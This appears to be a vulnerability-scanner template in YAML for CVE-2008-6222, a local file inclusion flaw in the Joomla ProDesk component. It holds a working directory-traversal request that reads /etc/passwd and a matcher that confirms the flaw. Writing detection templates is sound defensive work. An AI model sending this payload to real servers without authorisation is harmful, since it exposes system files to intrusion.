28 lines
799 B
YAML
28 lines
799 B
YAML
|
id: CVE-2008-6222
|
||
|
|
||
|
info:
|
||
|
name: Joomla! Component ProDesk 1.0/1.2 - Local File Inclusion
|
||
|
author: daffainfo
|
||
|
severity: high
|
||
|
description: Directory traversal vulnerability in the Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php.
|
||
|
reference:
|
||
|
- https://www.exploit-db.com/exploits/6980
|
||
|
- https://www.cvedetails.com/cve/CVE-2008-6222
|
||
|
tags: cve,cve2008,joomla,lfi
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd"
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
|
||
|
- type: regex
|
||
|
regex:
|
||
|
- "root:.*:0:0"
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|